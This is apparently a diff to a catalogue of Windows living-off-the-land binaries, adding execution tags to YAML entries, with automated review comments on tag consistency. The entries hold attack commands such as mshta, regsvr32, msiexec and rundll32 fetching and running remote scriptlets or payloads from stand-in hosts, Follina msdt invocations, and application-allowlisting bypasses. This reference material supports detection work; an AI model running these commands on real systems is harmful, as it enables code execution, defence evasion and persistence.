Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1036 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 56b2a4fa0..f8c829ef1 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index ed0a6019e..e6811049e 100644 --- a/yml/OSBinaries/Msdt.yml 
+++ b/yml/OSBinaries/Msdt.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -31,6 +33,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: CMD Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 284430336..d0cc16d41 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9fe0..eb8167d41 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml 
@@ -12,7 +12,8 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: HTA + - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream @@ -35,7 +40,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - - Execute: WSH + - Execute: HTA - Command: mshta.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 35a97e481..7de2d333f 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml 
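Review bot: The `vbscript:` and `javascript:` entries in Mshta.yml (hunks at -20 and -27) receive only a script-language tag, although their visible commands load `script:https://webserver/payload.sct`, which elsewhere in this patch (Cmstp, Msiexec, Ieexec) earns `- Execute: Remote`. Meanwhile `Remote` is added at -12 to an entry whose command sits above the hunk and cannot be checked here. Suggest adding `- Execute: Remote` under both new `Tags:` blocks (after `- Execute: VBScript` and after `- Execute: JScript`) and confirming the -12 entry actually references a remote resource.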
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -27,6 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -36,6 +42,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -43,6 +50,10 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: MST + - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe 
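Review bot: `- Execute: Remote` is added to the `msiexec /y "C:\folder\evil.dll"` and `msiexec /z "C:\folder\evil.dll"` entries in the third and fourth Msiexec.yml hunks, but both commands take a local path and their descriptions only describe calling DllRegisterServer / DllUnregisterServer on that DLL. The Remote tag looks intended for the `http://` and `https://` entries in this file, which already receive it in the second and fifth hunks; the two added `- Execute: Remote` lines under the `Execute: DLL` tags should be removed so the tag stays meaningful for detection engineers filtering on it.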
diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 8a8ee4038..7162943a5 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -20,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: DLL + - Execute: Remote - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\pcalua.exe Detection: diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index de15d0709..cf36bb628 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pcwrun.exe /../../$(calc).exe Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\pcwrun.exe Detection: 
diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 1da2ab6b8..5c45cce0d 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1547 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\system32\pnputil.exe Code_Sample: diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 8a1b221d5..0898d43f6 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 0d29e27a3..16d6a1199 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 2272b2631..a5314d116 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml 
@@ -5,15 +5,14 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -22,8 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 3a65a66f4..b1fde2088 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml 
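Review bot: The first Regasm.yml hunk rewrites the description to `.Net DLL` while the new tag reads `DLL (.NET)`; the same `.Net` spelling is used in both Regsvcs.yml descriptions in the next hunk, so pick one capitalization (`.NET` matches the tag and the `Microsoft.NET` paths in Full_Path) and use it throughout. In the same Regasm.yml hunk the `/U` entry's description still says `Loads the target .DLL file and executes the UnRegisterClass function.` even though its tag also becomes `DLL (.NET)`, whereas Regsvcs.yml updates both entries; the Regasm `/U` description should get the same edit. If Execute tag values are validated against a fixed list, `DLL (.NET)` with its space and parentheses needs to be present there; I cannot tell from the diff whether that is the case.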
@@ -5,25 +5,23 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 27067b81c..979d24dce 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting 
@@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -25,6 +30,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -32,6 +40,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index ba5d622da..d1941d1eb 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml 
@@ -22,13 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution 
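Review bot: This Rundll32.yml hunk deletes an entire command entry (the `javascript:` variant whose description is "runs a PowerShell script that is downloaded from a remote web site"), and the next hunk deletes a second one (the variant that "kills the Rundll32.exe process that was started"), which goes beyond what the commit title "Adding Execute tags" describes. Entries like these are referenced by detection content and documentation, so the removal should at least be explained in the commit message (for example if they are considered duplicates of the retained `GetObject("script:...")` entry) or split into its own commit. Also, the added `- Execute: Remote` lands under the `Execute: DLL` tag of the entry preceding the deletion, whose Command line is above the hunk; please confirm that entry actually references a remote location, since the entry that clearly did fetch from a remote site is the one being removed.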
@@ -36,13 +30,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -50,6 +39,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream @@ -67,7 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 4437afe30..eafab6008 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml 
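Review bot: In the third Rundll32.yml hunk the entry `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/...")` gets only `- Execute: JScript`, although its Usecase reads "Execute code from Internet" and the command loads a script from an `https://` URL. For consistency with the `- Execute: Remote` tag this commit adds to other network-fetching entries (Msiexec, Regsvr32, Wmic), the new block should read `- Execute: JScript` followed by `- Execute: Remote`. The last hunk changes the final entry's tag from DLL to COM, but that entry's Command line is outside the hunk, so the new value cannot be verified from the diff.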
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index b3191dcae..40b17aaad 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 95cbcb66b..cd8d44388 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index f8fa24a10..7766c069c 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f439dc8dd..a938e760b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index be2a779c7..bd8b11895 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures 
@@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 734aba29b..4e4dd1dad 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index aa20ad96c..975c8316c 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 4c17e6301..7b12cf3ce 100644 
--- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 + Tags: + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index a2f312ee5..8c62daf9a 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 085a9827d..2ab7e481e 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 31c79c154..145bd6fca 100644 --- a/yml/OSBinaries/Ttdinject.yml 
+++ b/yml/OSBinaries/Ttdinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 + Tags: + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d2125bd08..7c51f3826 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 + Tags: + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index d05fd20e6..541818d22 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 0511e95b3..4ede8878e 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml 
